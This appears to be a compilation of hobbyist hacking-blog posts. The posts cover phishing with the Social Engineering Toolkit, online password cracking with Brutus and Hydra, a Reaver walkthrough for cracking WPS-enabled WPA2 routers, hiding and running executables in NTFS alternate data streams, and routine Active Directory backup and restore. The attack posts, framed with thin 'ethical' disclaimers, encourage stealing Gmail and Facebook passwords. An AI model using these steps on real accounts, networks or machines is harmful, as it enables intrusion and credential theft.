Password Attack using Social Engineering Toolkit

Continuing my last post about password attack.. Have you tried my previously discussed tricks???
Whatever, I will discuss about other password recovery method.
Rather then direct attacking you also try these two method.
1) Phishing:- This method used to create a fake login page of a popular website such as
Gmail, Yahoo, Facebook & Orkut etc .So when ever any user enter username & password it
send to tour per-defined e-mail id.Using it you can easily hack gmail or facebook password.
Though I always ask you to keep the word "Ethical" in mind. So be a good chap. Try it for fun and educational purpose.  Design a absolute duplicate copy of those page are really tough.
But don't worry with the right tool this is piece of cake. The best one I used a lot during my training demonstration is SET(Social Engineering Toolkit). Trust me, with a little look out you can do the phishing attack
in some simple step.

You need
1.An  internet connection
2. SET  (Inbuilt-ed in many Penetration testing distribution such as Backtrack)
3. A little creativity to trap your target (There are lot of method you can use as per your scenario)
4. Having familiar with Backtrack live CD & Metasploit Framework can be a great advantage

Currently I am giving you a great link to know how to use  it.
Step by Step Guide to SET

Beside the phishing SET has lot of feature:-

a) Hack a remote computer
b) Create a exploited USB media, when run on victim PC that will be automatically accessible
c) Running an exploited web server to hack a PC

Let me know if any further guide is needed.

Active Directory Backup

Active Directory Backup & Restoration in Server 2008

Before Going Through this install Backup from Server Manager

1. Open up your command prompt by clicking Start and type “cmd” and hit enter.

2. In your command prompt type 
wbadmin start systemstatebackup -backuptarget:e: 
and press enter.

Note: You can use a different backup target of your choosing

3. Type “y” and press enter to start the backup process.

When the backup is finished running you should get a message that the backup completed successfully. If it did not complete properly you will need to troubleshoot.

Now you have a system state backup of your 2008 Server!

Authoritative Restore of Active Directory

So now what if you accidentally delete an OU, group, or a user account and it’s already replicated to your other servers? We will need to perform an authoritative restore of the Active Directory object you accidentally deleted.

1. To do this you will need to boot into DSRM (Directory Services Restore Mode) by restarting your server and pressing F8 during the restart.

2.Choose Directory Services Restore Mode from the Advanced Boot menu.

3. Login to your server with your DSRM password you created during Active Directory installation.

4. Once you’re logged into your server and in DSRM safe mode, open a command prompt by clicking Start, type “cmd“, and press enter.

5. To make sure you restore the correct backup it’s a good idea to use the “wbadmin get versions” command and write down the version you need to use.

6. Now we need to perform a non-authoritative restore of Active Directory by typing
wbadmin start systemstaterecovery -version:04/14/2009-02:39

Note: The version of backup will vary depending on your situation. Type “y” and press enter to start the non authoritative restore.

7. Go grab some coffee and take a break while the restore completes.

8. You can mark the sysvol as authoritative by adding the –authsysvol switch to the end of the wbadmin command.

9. But if you want to restore a specific Active Directory object then you can use the ever familiar ntdsutil.

For this example we are going to restore a user account with a distinguished name of 
"CN=Test User,CN=Users,DC=example,DC=com"
So the commands would be:

ntdsutil
activate instance ntds
authoritative restore
restore object “cn=Test User,cn=Users,dc=example,dc=com”

Note: The quotes are required

10. Reboot your server into normal mode and you’re finished. The object will be marked as authoritative and replicate to the rest of your domain.

Using Active Directory Snapshots

There is a really cool new feature in Windows Server 2008 called Active Directory Snapshots. Volume Shadow Copy Service now allows us to take a snapshot of Active Directory as a type of backup. They are very quick to create and serve as another line of defense for your backup strategy.

With your server booted into normal mode open a command prompt by clicking Start, type “cmd“, and press enter.

We are going to use the ntdsutil again for creating the Active Directory snapshots. The commands are:

ntdsutil
snapshot
activate instance ntds
create
quit
quit

So now that you have a snapshot of AD, how do you access the data? First we need to mount the snapshot using ntdsutil. The commands are:

ntdsutl
snapshot
list all
mount 1 — (Note: You should mount the correct snapshot you need; for this example there is only 1.)
quit
quit

Your snapshot is mounted, but how do you access the data? We need to use the dsamain command to accomplish this. Then we need to select an LDAP port to use. The command is as follows:

dsamain –dbpath c:\$SNAP_200905141444_VOLUMEC$\WINDOWS\NTDS\ntds.dit –ldapport 10001

The result should look like this:

Now we need to go to Start, Administrative Tools, then Active Directory Users and Computers.

Right click Active Directory Users and Computers and select Change Domain Controller.

In the area that says < Type a Directory Server name [:port] here > enter the name of your server and the LDAP port you used when running the dsamain command.

For my example it would be: WIN-V22UWGW0LU8.HOME.LOCAL:10001

Now you can browse the snapshot of Active Directory without affecting anything else negatively.

Step by step guide to password hacking

Password Hacking

Although password hacking or cracking is not an ultimate goal of an

expert hacker, It is very import in the aspect of security.A newbie who just search google for password hacking & drop into this blog, pls note that you are not going to learn this in a second. 

Before you start reading further, be sure you really know what is password, how & where they can be used.Before we jump into the topic we need to streamline our task.
password attack can be divided into two type:
a) Online Password Attack
b) Offline Password Attack

Note: From now on keep the word "Ethical" in mind & use this knowledge to improve your security, not try these
one corporate network.If you got caught, I will be not there to save you. :)

Coming back to the topic, password attack can be done using  bellow methods:
1) Bruteforce Method :- Trying randomly generated password & 

                                        test them against the server.
2) Dictinory Method:- In this method, all probable password are 

                                    listed in file, each of them tested against

                                   the server.Its faster & having a good dictinory

                                   file can make the task really easy.
3) Rainbow Attack:- This method quite a newer, basically use to crack hash password. To know more about
                                Password hashes go back to Google or request an article here.
Now straight back into the business.
Online password attack:- Do the test in a test network or virtual pc, with simple passwords at the beginning.

I will discuss about two interesting tool for online password attack, Brutus & Hydra. The second one is my fav.

You can download them using below link:

Download Brutus

Hydra [Windows] Hydra [Linux source code]

Brutus: Brutus is one of the fastest, most flexible remote password crackers you can get your hands on - it's also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available. Brutus was first made publicly available in October 1998.

So its very simple to launch the attack Just type your target IP & select the service type & attack method.

Click on start to launch the attack.If lucky the password will be displayed in few moment.

Try on your local ftp server with a shorter password which make you believe this can work & keep trying.

Hydra: Originally developped by thc, Its better because it bcan run on unix platform & support a lot of protocol then its competitor. Its faster, If you familiar with the command line version with a bit effort you surely fall in love with it. For those, who hate commands, luckily GUI version is also available.But a friendly reminder if you really want to be a hacker start loving command line. Believe me, there is no other alternative. For help regarding it visit http://www.thc.org/thc-hydra/ for detail documentation. If you found it difficult to understand, ask for a post here.

Will continue the topic in my next post. till then happy cracking.

Be a member for more interesting topic.Thank you For reading. 

 

WPA2 password hacking

How to Crack WPA2 password 802.11 Wifi

Note: Method works only with WPA routers which have WPS support. Most routers sold since   2008 and later are WPS enabled.
         This tutorial for educational purpose only. i am not encouraging anyone to hack into other AP & make them paying high for the internet Bill
Downloads & setup:

    I used  Ubuntu but you can use any linux distro. Root access is must.
    libpcap:- Traffic capture library
    Reaver :-  Hacking tool. Download Reaver-1.4

    Iwscanner:- Wifi scanning Tool. Download link-  Iwscanner 0.24[Ubuntu]  Iwscanner-0.2.4 [Linux generic]

Step 1. Install Libpcap & Its dependencies:

    sudo apt-get update

    sudo apt-get install build-essential

    sudo apt-get install flex bison

    sudo apt-get install libpcap-dev

    sudo apt-get install libpcap3-dev

    sudo apt-get install libsqlite3-dev

    sudo apt-get install libnl2-dev

Step 2. How to Compile/Build Reaver:

Make sure you’ve build-essential, then run following commands (assuming reaver is extracted to desktop):

    cd ~/Desktop/reaver-1.4/src

    ./configure

    make

    sudo make install


Step 3. Identify MAC address of the target router.

You can use any Wifi Scanner like iwScanner  to note the MAC address of the target Wifi SSID.


Step 4. Putting your Wireless card to monitor mode.

Run these commands on terminal:

    sudo ifconfig wlan0 down

    sudo iwconfig wlan0 mode monitor

    sudo ifconfig wlan0 up


Step 5. Starting the attack:

Reaver only requires two inputs to launch an attack: the interface to use to launch them, and the MAC address of the target:

    sudo  reaver -i wlan0 -b 00:11:22:33:44:55  [replace this with target MAC Address ]

Wait for few Our (Yes, patiance is the key)

Step 4. When the attack finishes, it will give you the SSID and authentication password for the target network.

During the attack the target AP can  stop responding & caused a denial of service  DoS attack.

God Mode in Windows 7 (Work in Vista & win8 too)

This hidden feature will conveniently put hundreds of settings from all over the OS into one place.

Step:

Create a new folder on your desktop and name it

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

270 items will automatically be added to the folder consisting of every configurable option in Windows 7.

Happy Computing Folks!!!

Finding Alternate Data Stream

Finding Alternate Data Stream

We can use LADS to find if any Alternate Data Stream is hidden in Our System

Syntax are pretty simple. adding /s is also look for subdirectory

C:\>lads c:\
LADS - Freeware version 4.00
(C) Copyright 1998-2004 Frank Heyne Software (http://www.heysoft.de)
This program lists files with alternate data streams (ADS)
Use LADS on your own risk!
Scanning directory C:\
size ADS in file
---------- ---------------------------------
Error 32 opening C:\pagefile.sys
368146432 C:\sample.txt:pp.avi
18 C:\sample.txt:secret.txt
21 C:\data\:mean.txt
The following summary might be incorrect because there was at least one error!
368132511 bytes in 3 ADS listed


C:\>lads /?

LADS - Freeware version 4.00
(C) Copyright 1998-2004 Frank Heyne Software (http://www.heysoft.de)
This program lists files with alternate data streams (ADS)
Use LADS on your own risk!

Usage: LADS [Directory] [/S] [/D] [/A] [/Xname]
Directory: directory to scan, current if ommitted
/S include Subdirectories
/D Debug LADS ;-)
/V Verbose error reports
/A give a summary of All bytes used in the scanned directories
(All files and directories are considered as uncompressed
and all security decriptions are skipped
for calculating this number!)
/Xname eXclude any ADS "name"
/Pfile read Parameters from "file"

C:\> 
Download LADS from LADS DOWNLOAD

In Windows Vista & Higher OS you can try

DIR /R command for the same

Alternate Data Stream

ADS(Alternate Data Stream):- Windows Has a weired feature in NTFS file system. Which can be used for different purpose. Its upto you. Using this you can hide a file/folder inside an another file so that no one else can see that, most amazingly the file size will not increase. I am giving you an example to hide an exe into a text file. Try it. Visit Ethical hacking Section of my blog & request for detail if you want to know all the aspect of this feature & counter forensic technique.

copy calc.exe from windows\system32 folder to c: drive
Now create a text file (say sample.txt) in c: drive

now run following command
C:\>type calc.exe>sample.txt:calc.exe
Delete the calc.exe.
Now open sample.txt & check its isze also . & then run

C:\>start .\sample.txt:calc.exe

Enjoy it... You can hide any file using it....